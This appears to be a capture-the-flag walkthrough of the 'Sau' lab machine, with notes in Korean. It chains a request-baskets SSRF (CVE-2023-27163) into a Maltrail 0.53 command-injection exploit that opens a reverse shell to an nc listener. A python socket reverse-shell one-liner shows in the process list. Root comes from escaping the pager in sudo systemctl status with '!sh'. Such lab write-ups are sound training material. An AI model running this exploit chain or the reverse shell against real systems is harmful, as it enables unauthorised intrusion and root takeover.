Proof of Concept
10.129.20.178
Nmap
PORT STATE SERVICE
22/tcp open ssh
55555/tcp open unknownInitial Access
http://10.129.20.178:5555 웹서비스 접속 후 소스코드에서 “request-baskets 1.2.1” 서비스 사용중인 것을 확인
request-baskets 1.2.1 서비스에서 SSRF 취약점 발견 (CVE-2023-27163)
Downloaded POC
┌──(kali㉿kali)-[~/Sau]
└─$ git clone https://github.com/madhavmehndiratta/CVE-2023-27163.git
Cloning into 'CVE-2023-27163'...
remote: Enumerating objects: 6, done.
remote: Counting objects: 100% (6/6), done.
remote: Compressing objects: 100% (5/5), done.
remote: Total 6 (delta 0), reused 3 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (6/6), done.SSRF 취약점을 이용하여 내부에서만 접근 가능한 80포트로 접근할 수 있는 URL 생성
┌──(kali㉿kali)-[~/Sau/CVE-2023-27163]
└─$ python CVE-2023-27163.py http://10.129.20.178:55555 http://127.0.0.1:80
Creating a proxy basket zbrrhb...
Basket Created!
Accessing the http://10.129.20.178:55555/zbrrhb makes the server request to http://127.0.0.1:80
Authorization Token: CkO85WLROyLkbbAfCgT-2lMqVfdS0W3DFPVliaXIggGI내부에서 접근 가능한 80포트에서 “maltrail 0.53” 서비스 사용 중인것을 확인
┌──(kali㉿kali)-[~/Sau/CVE-2023-27163]
└─$ curl http://10.129.20.178:55555/zbrrhb
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html;charset=utf8">
<meta name="viewport" content="width=device-width, user-scalable=no">
<meta name="robots" content="noindex, nofollow">
<title>Maltrail</title>
<link rel="stylesheet" type="text/css" href="css/thirdparty.min.css">
<link rel="stylesheet" type="text/css" href="css/main.css">
<link rel="stylesheet" type="text/css" href="css/media.css">
<script type="text/javascript" src="js/errorhandler.js"></script>
<script type="text/javascript" src="js/thirdparty.min.js"></script>
<script type="text/javascript" src="js/papaparse.min.js"></script>
</head>
<body>
<div id="header_container" class="header noselect">
<div id="logo_container">
<SNIP
<div id="bottom_blank"></div>
<div class="bottom noselect">Powered by <b>M</b>altrail (v<b>0.53</b>)</div>
<ul class="custom-menu">
<li data-action="hide_threat">Hide threat</li>
<li data-action="report_false_positive">Report false positive</li>
</ul>
<script defer type="text/javascript" src="js/main.js"></script>
</body>
</html>Mailtrail 0.53 서비스에는 RCE 취약점이 존재
POC 다운로드
┌──(kali㉿kali)-[~/Sau]
└─$ git clone https://github.com/apaz-dev/Maltrail-v0.53-RCE.git
Cloning into 'Maltrail-v0.53-RCE'...
remote: Enumerating objects: 24, done.
remote: Counting objects: 100% (24/24), done.
remote: Compressing objects: 100% (21/21), done.
remote: Total 24 (delta 8), reused 9 (delta 3), pack-reused 0 (from 0)
Receiving objects: 100% (24/24), 6.13 KiB | 897.00 KiB/s, done.
Resolving deltas: 100% (8/8), done.4444 포트에 NC 리버스쉘 리스너 실행
┌──(kali㉿kali)-[~/Sau]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...POC 실행
┌──(kali㉿kali)-[~/Sau/Maltrail-v0.53-RCE]
└─$ ./exploit.sh -t http://10.129.20.178:55555/zbrrhb -i 10.10.14.17
[*] Start listen from ip 10.10.14.17 on port 4444리버스쉘 연결 성공
┌──(kali㉿kali)-[~/Sau]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.129.20.178] 59056
$Read user.txt
$ cat user.txt
cat user.txt
09fc6f298d333bdfa5448c1a0d37e917
$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:c1:1d brd ff:ff:ff:ff:ff:ff
inet 10.129.20.178/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 2937sec preferred_lft 2937sec
inet6 dead:beef::250:56ff:feb0:c11d/64 scope global dynamic mngtmpaddr
valid_lft 86396sec preferred_lft 14396sec
inet6 fe80::250:56ff:feb0:c11d/64 scope link
valid_lft forever preferred_lft foreverPrivilege Escalation
sudo 권한으로 “/usr/bin/systemctl status trail.service” 실행 가능한 것을 확인
puma@sau:~/.gnupg$ sudo -l
sudo -l
Matching Defaults entries for puma on sau:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User puma may run the following commands on sau:
(ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.serviceroot 권한으로 “/usr/bin/systemctl status trail.service” 실행
puma@sau:~/.gnupg$ sudo /usr/bin/systemctl status trail.service
sudo /usr/bin/systemctl status trail.service
● trail.service - Maltrail. Server of malicious traffic detection system
Loaded: loaded (/etc/systemd/system/trail.service; enabled; vendor preset:>
Active: active (running) since Wed 2026-02-11 14:18:11 UTC; 1h 39min ago
Docs: https://github.com/stamparm/maltrail#readme
https://github.com/stamparm/maltrail/wiki
Main PID: 882 (python3)
Tasks: 18 (limit: 4662)
Memory: 40.5M
CGroup: /system.slice/trail.service
├─ 882 /usr/bin/python3 server.py
├─1243 /bin/sh -c logger -p auth.info -t "maltrail[882]" "Failed p>
├─1244 /bin/sh -c logger -p auth.info -t "maltrail[882]" "Failed p>
├─1253 sh
├─1254 python3 -c import socket,os,pty;s=socket.socket(socket.AF_I>
├─1255 /bin/sh
├─1258 /bin/sh -c logger -p auth.info -t "maltrail[882]" "Failed p>
├─1259 /bin/sh -c logger -p auth.info -t "maltrail[882]" "Failed p>
├─1262 sh
├─1263 python3 -c import socket,os,pty;s=socket.socket(socket.AF_I>
├─1264 /bin/sh
├─1280 script -qc /bin/bash /dev/null
├─1281 /bin/bash
├─1319 sudo /usr/bin/systemctl status trail.service
lines 1-23“!sh”를 입력하여 쉘 실행
puma@sau:~/.gnupg$ sudsudo /usr/bin/systemctl status trail.service
sudo /usr/bin/systemctl status trail.service
● trail.service - Maltrail. Server of malicious traffic detection system
Loaded: loaded (/etc/systemd/system/trail.service; enabled; vendor preset:>
Active: active (running) since Wed 2026-02-11 14:18:11 UTC; 1h 40min ago
Docs: https://github.com/stamparm/maltrail#readme
https://github.com/stamparm/maltrail/wiki
Main PID: 882 (python3)
Tasks: 18 (limit: 4662)
Memory: 40.5M
CGroup: /system.slice/trail.service
├─ 882 /usr/bin/python3 server.py
├─1243 /bin/sh -c logger -p auth.info -t "maltrail[882]" "Failed p>
├─1244 /bin/sh -c logger -p auth.info -t "maltrail[882]" "Failed p>
├─1253 sh
├─1254 python3 -c import socket,os,pty;s=socket.socket(socket.AF_I>
├─1255 /bin/sh
├─1258 /bin/sh -c logger -p auth.info -t "maltrail[882]" "Failed p>
├─1259 /bin/sh -c logger -p auth.info -t "maltrail[882]" "Failed p>
├─1262 sh
├─1263 python3 -c import socket,os,pty;s=socket.socket(socket.AF_I>
├─1264 /bin/sh
├─1280 script -qc /bin/bash /dev/null
├─1281 /bin/bash
├─1338 sudo /usr/bin/systemctl status trail.service
lines 1-23!!sh
!sh
#Read root.txt
# cat root.txt
cat root.txt
f432255ea7c0caeae9fcd5f0bfcef780
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:c1:1d brd ff:ff:ff:ff:ff:ff
inet 10.129.20.178/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 2386sec preferred_lft 2386sec
inet6 dead:beef::250:56ff:feb0:c11d/64 scope global dynamic mngtmpaddr
valid_lft 86394sec preferred_lft 14394sec
inet6 fe80::250:56ff:feb0:c11d/64 scope link
valid_lft forever preferred_lft forever